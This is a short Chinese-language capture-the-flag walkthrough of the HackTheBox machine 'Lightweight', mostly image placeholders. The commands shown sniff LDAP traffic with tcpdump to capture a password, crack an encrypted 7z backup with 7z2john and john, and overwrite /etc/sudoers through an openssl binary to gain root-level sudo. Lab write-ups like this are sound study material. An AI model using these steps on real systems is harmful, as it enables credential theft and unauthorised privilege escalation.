Lightweight - HackTheBox
Td

image

nmap扫描

image

image

先看80

image

image

这边是说添加了一个账号到ssh,然后账号密码都是访问的IP地址

image

直接提权?

image

有一个tcpdump可以以管理员身份运行,但不能获取权限

image

这边还开放了389端口

ldapsearch -x -H ldap://10.10.10.119 -b "DC=lightweight,DC=htb" -s sub

image

貌似可以获得密码,用tcpdump来监听一下ldap协议的流量

tcpdump -i any -X port ldap

image

貌似这就是密码,切换账户

image

继续

image

在家目录下发现一个backup的压缩包,下到本地看看

image

报错,把压缩包进行个编码在下载

image

image

解压

7z e backup.7z

image

要密码,爆破一下

apt-get install liblzma-dev

cpan -i Compress::Raw::Lzma

https://github.com/philsmd/7z2hashcat

perl 7z2john.pl backup.7z >hash

image

在用john爆破

image

解压出了一堆php文件

image

image

另一个用户的密码

在家目录下发现一个openssl

image

image

可以用openssl写入一个sudo -l权限给一个用户

echo -ne "root\tALL=(ALL) ALL\n\"10.10.14.12\"\tALL=(ALL) ALL\n%sudo\tALL=(ALL) ALL\n" |base64 > ca

image

/home/ldapuser1/openssl base64 -d -in ca -out /etc/sudoers

image

在切换回10.10.14.12用户

image

image

image